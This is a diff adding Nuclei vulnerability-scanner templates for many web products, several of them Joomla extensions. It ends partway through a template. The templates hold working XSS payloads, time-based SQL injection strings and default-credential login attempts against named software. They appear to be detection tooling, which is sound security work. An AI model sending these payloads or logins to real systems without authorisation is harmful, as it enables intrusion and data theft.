a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml new file mode 100644 index 0000000000..ce036128bc --- /dev/null +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-41538 + +info: + name: PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter. + reference: + - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0 + - https://nvd.nist.gov/vuln/detail/CVE-2023-41538 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-41538 + cwe-id: CWE-79 + cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,xss,phpjabber,jabber + +http: + - method: GET + path: + - "{{BaseURL}}/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&pjPage=1&column=created&direction=DESC&keyword=%22>" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "New Question", ">")' + condition: and diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml new file mode 100644 index 0000000000..62f06d4cd2 --- /dev/null +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -0,0 +1,34 @@ +id: CVE-2023-4168 + +info: + name: Adlisting Classified Ads 2.14.0 - Information Disclosure + author: r3Y3r53 + severity: high + description: | + Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects. + reference: + - https://www.exploit-db.com/exploits/51667 + - https://templatecookie.com/demo/adlisting-classified-ads-script + - https://nvd.nist.gov/vuln/detail/CVE-2023-4168 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-4168 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + tags: cve,cve2023,adlisting,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "google_map_key", "api_key", "auth_domain")' + condition: and diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml new file mode 100644 index 0000000000..b41c287f5b --- /dev/null +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-4547 + +info: + name: SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + A vulnerability was found in SPA-Cart eCommerce CMS 1.9.0.3. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /search. The manipulation of the argument filter[brandid]/filter[price] leads to cross site scripting. The attack may be launched remotely. VDB-238058 is the identifier assigned to this vulnerability. + reference: + - https://spa-cart.com + - https://cxsecurity.com/ascii/WLB-2023080090 + - https://nvd.nist.gov/vuln/detail/CVE-2023-4547 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 3.5 + cve-id: CVE-2023-4547 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,spa-cart,unauth,xss + +http: + - method: GET + path: + - '{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331">&filter[attr][Memory][]=16+GB' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '100-1331">' + - '' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml new file mode 100644 index 0000000000..9ce606d1d7 --- /dev/null +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-4974 + +info: + name: Academy LMS 6.2 - SQL Injection + author: theamanrawat + severity: medium + description: | + A vulnerability was found in Academy LMS 6.2. It has been rated as critical. Affected by this issue is some unknown functionality of the file /academy/tutor/filter of the component GET Parameter Handler. The manipulation of the argument price_min/price_max leads to sql injection. The attack may be launched remotely. VDB-239750 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. + reference: + - https://demo.creativeitem.com/academy/ + - https://packetstormsecurity.com/files/174681/Academy-LMS-6.2-SQL-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-4974 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2023-4974 + cwe-id: CWE-89 + metadata: + verified: true + shodan-query: html:"Academy LMS" + tags: cve,cve2023,sqli,academy,lms + +http: + - raw: + - | + @timeout: 20s + GET /tutor/filter?searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - duration>=7 + - status_code == 500 + - contains(body, "Courses") + condition: and diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml new file mode 100644 index 0000000000..3bcba330ae --- /dev/null +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-5244 + +info: + name: Microweber < V.2.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Reflected Cross-Site Scripting Vulnerability in types GET parameter on the /editor_tools/rte_image_editor endpoint. + reference: + - https://huntr.dev/bounties/a3bd58ba-ca59-4cba-85d1-799f73a76470/ + - https://vuldb.com/?id.240778 + - https://nvd.nist.gov/vuln/detail/CVE-2023-5244 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + cve-id: CVE-2023-5244 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2023,xss,microweber + +http: + - method: GET + path: + - "{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains_all(body, "alert(document.domain)", "microweber")' + condition: and diff --git a/http/default-logins/batflat/batflat-default-login.yaml b/http/default-logins/batflat/batflat-default-login.yaml new file mode 100644 index 0000000000..5b4ddefdb2 --- /dev/null +++ b/http/default-logins/batflat/batflat-default-login.yaml @@ -0,0 +1,41 @@ +id: batflat-default-login + +info: + name: Batflat CMS - Default Login + author: r3Y3r53 + severity: high + description: | + Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings. + reference: + - https://www.exploitalert.com/view-details.html?id=34749 + - https://cxsecurity.com/issue/WLB-2020010100 + metadata: + google-query: intext:"Powered by Batflat." + verified: true + tags: default-login,batflat + +http: + - raw: + - | + POST /admin/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&login= + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + + cookie-reuse: true + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "Batflat - Dashboard")' + condition: and diff --git a/http/default-logins/eurotel/etl3100-default-login.yaml b/http/default-logins/eurotel/etl3100-default-login.yaml new file mode 100644 index 0000000000..0c47f04677 --- /dev/null +++ b/http/default-logins/eurotel/etl3100-default-login.yaml @@ -0,0 +1,46 @@ +id: etl3100-default-login + +info: + name: EuroTel ETL3100 - Default Login + author: r3Y3r53 + severity: high + description: | + The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5782.php + - https://www.exploit-db.com/exploits/51684 + metadata: + max-request: 2 + verified: true + shodan-query: html:"ETL3100" + fofa-query: body="ETL3100" + tags: misconfig,default-login,eurotel + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + txtUserId={{username}}&txtPassword={{password}}&btnLogin=Login + + - | + GET /exciter.php HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - user + - operator + password: + - etl3100rt1234 + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains_all(body_2, "FM Exciter", "Summary", "/logout.php")' + condition: and diff --git a/http/default-logins/franklin-fueling-default-login.yaml b/http/default-logins/franklin-fueling-default-login.yaml new file mode 100644 index 0000000000..e02b79673c --- /dev/null +++ b/http/default-logins/franklin-fueling-default-login.yaml @@ -0,0 +1,42 @@ +id: franklin-fueling-default-login + +info: + name: Franklin Fueling System Default Login - Detect + author: r3Y3r53 + severity: high + description: | + A default password vulnerability refers to a security flaw that arises when a system or device is shipped or set up with a pre-configured, default password that is commonly known or easily guessable. + reference: + - https://www.exploitalert.com/view-details.html?id=39466 + metadata: + google-query: inurl:"relay_status.html" + verified: true + max-request: 1 + tags: default-login,franklin + +http: + - raw: + - | + POST /21408623/cgi-bin/tsaws.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + + + attack: pitchfork + payloads: + username: + - roleAdmin + - roleUser + - roleGuest + password: + - admin + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/xml")' + - 'contains(body, "roleAdmin") || contains(body, "roleUser") || contains(body, "roleGuest")' + condition: and diff --git a/http/default-logins/rconfig-default-login.yaml b/http/default-logins/rconfig-default-login.yaml new file mode 100644 index 0000000000..994dee0526 --- /dev/null +++ b/http/default-logins/rconfig-default-login.yaml @@ -0,0 +1,56 @@ +id: rconfig-default-login + +info: + name: rConfig - Default Login + author: theamanrawat + severity: high + description: | + rConfig contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://github.com/rconfig/rconfig + metadata: + verified: true + shodan-query: http.title:"rConfig" + tags: rconfig,default-login + +http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /lib/crud/userprocess.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&pass={{password}}&sublogin=1 + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + + cookie-reuse: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "Logged in as" + - "rConfig - Configuration Management" + - "dashboadFieldSet" + condition: and + + - type: word + part: header_2 + words: + - text/html + + - type: status + part: header_2 + status: + - 200 diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml new file mode 100644 index 0000000000..870ff70cb5 --- /dev/null +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml @@ -0,0 +1,44 @@ +id: timekeeper-default-login + +info: + name: TimeKeeper - Default Login + author: theamanrawat + severity: high + description: | + TimeKeeper contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://fsmlabs.com + metadata: + verified: true + shodan-query: http.favicon.hash:2134367771 + max-request: 1 + tags: timekeeper,default-login + +http: + - raw: + - | + GET /login?arg1={{url_encode(base64(username))}}&arg2={{url_encode(base64(password))}} HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "timekeeper" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "%7B%20%22username%22%20%3A%20%22admin%22%2C%20%22result%22%3A%20%22OK%22" + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml new file mode 100644 index 0000000000..ad6fdf7510 --- /dev/null +++ b/http/default-logins/wazuh-default-login.yaml @@ -0,0 +1,67 @@ +id: wazuh-default-login + +info: + name: Wazuh - Default Login + author: theamanrawat + severity: high + description: | + Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html + - https://wazuh.com + metadata: + verified: true + shodan-query: title:"Wazuh" + max-request: 2 + tags: wazuh,default-login + +http: + - raw: + - | + GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1 + Host: {{Hostname}} + + - | + POST /auth/login HTTP/1.1 + Host: {{Hostname}} + Osd-Version: {{osd}} + Content-Type: application/json + + {"username":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - "admin" + - "wazuh" + password: + - "admin" + - "wazuh" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"roles":' + condition: and + + - type: word + part: header + words: + - 'application/json' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: osd + group: 1 + regex: + - '"version":"([0-9.]+)"' + internal: true diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml new file mode 100644 index 0000000000..6f26f562d8 --- /dev/null +++ b/http/exposed-panels/unibox-panel.yaml @@ -0,0 +1,37 @@ +id: unibox-panel + +info: + name: Unibox Panel - Detect + author: theamanrawat + severity: info + description: Unibox Administrator panel was detected. + metadata: + verified: true + shodan-query: http.favicon.hash:176427349 + max-request: 1 + tags: panel,unibox,login + +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Unibox Administration' + - 'Please Login to continue' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/exposures/logs/redv-super-logs.yaml b/http/exposures/logs/redv-super-logs.yaml new file mode 100644 index 0000000000..f8ac508bc0 --- /dev/null +++ b/http/exposures/logs/redv-super-logs.yaml @@ -0,0 +1,26 @@ +id: redv-super-logs + +info: + name: RED-V Super Digital Signage System RXV-A740R - Log Information Disclosure + author: r3Y3r53 + severity: medium + description: | + The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several endpoints and disclose the webserver's log file list containing sensitive system resources and debug log information running on the device. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5609.php + metadata: + verified: true + tags: redv,log,disclosure,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/downloader.log" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/plain")' + - 'contains_all(body, "Log file", "[LogParser]", "[INFO]")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/joomla/joomla-com-booking-component.yaml b/http/vulnerabilities/joomla/joomla-com-booking-component.yaml new file mode 100644 index 0000000000..7899d30b69 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-com-booking-component.yaml @@ -0,0 +1,30 @@ +id: joomla-com-booking-component + +info: + name: Joomla! com_booking component 2.4.9 - Information Leak + author: r3Y3r53 + severity: high + description: | + Joomla! com_booking component suffers from Information leak vulnerability in which sensitive or confidential data is unintentionally exposed or made accessible to unauthorized individuals or systems. + reference: + - https://www.exploit-db.com/exploits/51595 + - http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download + metadata: + google-query: inurl:"index.php?option=com_booking" + verified: true + max-request: 1 + tags: joomla,info-leak,unauth + +http: + - raw: + - | + GET /index.php?option=com_booking&controller=customer&task=getUserData&id=123 HTTP/1.1 + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "name") && contains(body, "username") && contains(body, "email")' + - 'contains(content_type, "text/html")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/joomla/joomla-iproperty-real-estate-xss.yaml b/http/vulnerabilities/joomla/joomla-iproperty-real-estate-xss.yaml new file mode 100644 index 0000000000..2e69af89f5 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-iproperty-real-estate-xss.yaml @@ -0,0 +1,34 @@ +id: joomla-iproperty-xss + +info: + name: Joomla iProperty Real Estate 4.1.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Joomla extension iproperty is vulnerable to XSS in GET parameter 'filter_keyword'. + reference: + - https://www.exploit-db.com/exploits/51640 + - https://cxsecurity.com/issue/WLB-2023070076 + - https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/ + metadata: + verified: true + max-request: 1 + tags: joomla,xss,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&option=com_iproperty&view=allproperties&ipquicksearch=1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover="alert(document.domain)"style=' + - 'real estate' + condition: and + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/joomla/joomla-joombri-careers-xss.yaml b/http/vulnerabilities/joomla/joomla-joombri-careers-xss.yaml new file mode 100644 index 0000000000..e55775a1a8 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-joombri-careers-xss.yaml @@ -0,0 +1,29 @@ +id: joomla-joombri-careers-xss + +info: + name: Joomla JoomBri Careers 3.3.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://packetstormsecurity.com/files/168641/Joomla-JoomBri-Careers-3.3.0-Cross-Site-Scripting.html + - https://cxsecurity.com/issue/WLB-2022100024 + - https://extensions.joomla.org/ + metadata: + verified: true + max-request: 1 + tags: xss,joomla,joombri + +http: + - method: GET + path: + - "{{BaseURL}}/for-jobseekers/search-jobs?keyword=l9x1q%22onfocus%3D%22alert(document.domain)%22autofocus%3D%22ak5aghi5u9p" + + matchers: + - type: dsl + dsl: + - 'contains(body, "alert(document.domain)") && contains(body, "Joomla") && contains(tolower(body), "joombri")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/joomla/joomla-jvtwitter-xss.yaml b/http/vulnerabilities/joomla/joomla-jvtwitter-xss.yaml new file mode 100644 index 0000000000..42d3006a01 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-jvtwitter-xss.yaml @@ -0,0 +1,32 @@ +id: joomla-jvtwitter-xss + +info: + name: Joomla JVTwitter - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials. + reference: + - https://buaq.net/go-44433.html + - https://cxsecurity.com/issue/WLB-2020110041 + - https://extensions.joomla.org/ + metadata: + max-request: 1 + verified: true + google-query: inurl:mod_jvtwitter/jvtwitter.php?id= + tags: joomla,jvtwitter,xss + +http: + - method: GET + path: + - "{{BaseURL}}/modules/mod_jvtwitter/jvtwitter.php?id=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E" + - "{{BaseURL}}/modules/mod_jvtwitter/jvtwitter.php?id=" + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(content_type_1, "text/html")' + - 'contains(body_1, ">") && contains(body, "TEP STOP")' + - 'contains(content_type, "text/html")' + condition: and diff --git a/http/vulnerabilities/joomla/joomla-solidres-xss.yaml b/http/vulnerabilities/joomla/joomla-solidres-xss.yaml new file mode 100644 index 0000000000..dcd742b952 --- /dev/null +++ b/http/vulnerabilities/joomla/joomla-solidres-xss.yaml @@ -0,0 +1,39 @@ +id: joomla-solidres-xss + +info: + name: Joomla Solidres 2.13.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'. + reference: + - https://www.exploit-db.com/exploits/51638 + - https://cxsecurity.com/issue/WLB-2023070080 + - https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/ + metadata: + verified: true + max-request: 1 + tags: xss,joomla,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onfocus="confirm(document.domain)"autofocus' + - 'com_solidres' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/applezeed-sqli.yaml b/http/vulnerabilities/other/applezeed-sqli.yaml new file mode 100644 index 0000000000..d87489cd06 --- /dev/null +++ b/http/vulnerabilities/other/applezeed-sqli.yaml @@ -0,0 +1,31 @@ +id: applezeed-sqli + +info: + name: Applezeed - SQL Injection + author: r3Y3r53 + severity: high + description: | + Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database + reference: + - https://cxsecurity.com/issue/WLB-2019120057 + metadata: + google-query: intext:"Power BY applezeed.com" + verified: true + max-request: 1 + tags: sqli,unauth,applezeed + +http: + - raw: + - | + @timeout: 15s + GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(content_type, "text/html")' + - 'contains(body, "applezeed")' + - 'status_code == 200' + condition: and diff --git a/http/vulnerabilities/other/beyond-trust-xss.yaml b/http/vulnerabilities/other/beyond-trust-xss.yaml new file mode 100644 index 0000000000..f2adae2a55 --- /dev/null +++ b/http/vulnerabilities/other/beyond-trust-xss.yaml @@ -0,0 +1,29 @@ +id: beyond-trust-xss + +info: + name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint. + reference: + - https://www.exploit-db.com/exploits/50632 + metadata: + max-request: 1 + verified: true + shodan-query: html:"BeyondTrust" + google-query: intext:"BeyondTrust" "Redistribution Prohibited" + tags: beyondtrust,xss + +http: + - method: GET + path: + - "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "") && contains(body, "beyondtrust")' + condition: and diff --git a/http/vulnerabilities/other/csz-cms-sqli.yaml b/http/vulnerabilities/other/csz-cms-sqli.yaml new file mode 100644 index 0000000000..04f0aebbf5 --- /dev/null +++ b/http/vulnerabilities/other/csz-cms-sqli.yaml @@ -0,0 +1,28 @@ +id: csz-cms-sqli + +info: + name: CSZ CMS 1.3.0 - SQL Injection + author: r3Y3r53 + severity: high + description: | + CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities. + reference: + - https://packetstormsecurity.com/files/167028/CSZ-CMS-1.3.0-SQL-Injection.html + metadata: + verified: true + tags: sqli,csz,cms + +http: + - raw: + - | + @timeout: 20s + GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "CSZ CMS")' + condition: and diff --git a/http/vulnerabilities/other/doorgets-info-disclosure.yaml b/http/vulnerabilities/other/doorgets-info-disclosure.yaml new file mode 100644 index 0000000000..9fe05839e9 --- /dev/null +++ b/http/vulnerabilities/other/doorgets-info-disclosure.yaml @@ -0,0 +1,39 @@ +id: doorgets-info-disclosure + +info: + name: DoorGets CMS v7.0 - Information Disclosure + author: r3Y3r53 + severity: high + description: | + doorGets 7.0 has a sensitive information disclosure vulnerability in /setup/temp/admin.php. A remote unauthenticated attacker could exploit this vulnerability to obtain administrator's password. + reference: + - https://packetstormsecurity.com/files/174236/DoorGets-CMS-7.0-Information-Disclosure.html + - https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory + metadata: + google-dork: "Powered with doorGets ™" + verified: true + max-request: 1 + tags: doorgets,cms,packetstorm,disclosure + +http: + - method: GET + path: + - "{{BaseURL}}/v12/setup/temp/admin.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"email";' + - ':"password";' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/ep-web-cms-xss.yaml b/http/vulnerabilities/other/ep-web-cms-xss.yaml new file mode 100644 index 0000000000..f2481f5dee --- /dev/null +++ b/http/vulnerabilities/other/ep-web-cms-xss.yaml @@ -0,0 +1,33 @@ +id: ep-web-cms-xss + +info: + name: EP Web Solutions CMS - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site scripting is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. + reference: + - https://www.exploitalert.com/view-details.html?id=36197 + - https://cxsecurity.com/ascii/WLB-2020090139 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-79 + metadata: + google-query: intext:"EPweb " || intext:" Evergreen Park Web" + verified: true + max-request: 1 + tags: xss,epweb,unauth,cms + +http: + - method: GET + path: + - "{{BaseURL}}/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "/>") && contains(body, "EPweb")' + condition: and diff --git a/http/vulnerabilities/other/erensoft-sqli.yaml b/http/vulnerabilities/other/erensoft-sqli.yaml new file mode 100644 index 0000000000..0865696a5d --- /dev/null +++ b/http/vulnerabilities/other/erensoft-sqli.yaml @@ -0,0 +1,31 @@ +id: erensoft-sqli + +info: + name: ErenSoft - SQL Injection + author: r3Y3r53 + severity: high + description: | + SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries. + reference: + - https://cxsecurity.com/issue/WLB-2023070055 + metadata: + google-query: intext:"Kodlama:Erensoft" + verified: true + max-request: 1 + tags: sqli,unauth,erensoft + +http: + - raw: + - | + GET /videoseyret.php?id=95%20AND%20(SELECT%204581%20FROM%20(SELECT(SLEEP(6)))NyiX) HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html") && contains(body, "videoseyret")' + condition: and diff --git a/http/vulnerabilities/other/groomify-sqli.yaml b/http/vulnerabilities/other/groomify-sqli.yaml new file mode 100644 index 0000000000..117892bb47 --- /dev/null +++ b/http/vulnerabilities/other/groomify-sqli.yaml @@ -0,0 +1,32 @@ +id: groomify-sqli + +info: + name: Groomify v1.0 - SQL Injection Vulnerability + author: theamanrawat + severity: high + description: | + An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameter date_from, date_to, and id_product allows a remote attacker to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. + reference: + - https://codecanyon.net/item/groomify-barbershop-salon-spa-booking-and-ecommerce-platform/45808114# + - https://vulners.com/zdt/1337DAY-ID-38799 + metadata: + verified: "true" + max-request: 1 + tags: sqli,groomify,unauth + +http: + - raw: + - | + @timeout: 25s + GET /blog-search?search=deneme%27%20AND%20(SELECT%201642%20FROM%20(SELECT(SLEEP(6)))Xppf)%20AND%20%27rszk%27=%27rszk HTTP/2 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - duration>=6 + - status_code == 200 + - contains(header, "text/html") + - contains(body, 'value=\"deneme') + condition: and diff --git a/http/vulnerabilities/other/gz-forum-script-xss.yaml b/http/vulnerabilities/other/gz-forum-script-xss.yaml new file mode 100644 index 0000000000..b848ad6e25 --- /dev/null +++ b/http/vulnerabilities/other/gz-forum-script-xss.yaml @@ -0,0 +1,28 @@ +id: gz-forum-script-xss + +info: + name: GZ Forum Script 1.8 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it. + reference: + - https://www.exploit-db.com/exploits/51559 + - https://gzscripts.com/gz-forum-script.html + metadata: + verified: true + max-request: 1 + tags: gzforum,xss,unauth + +http: + - method: GET + path: + - 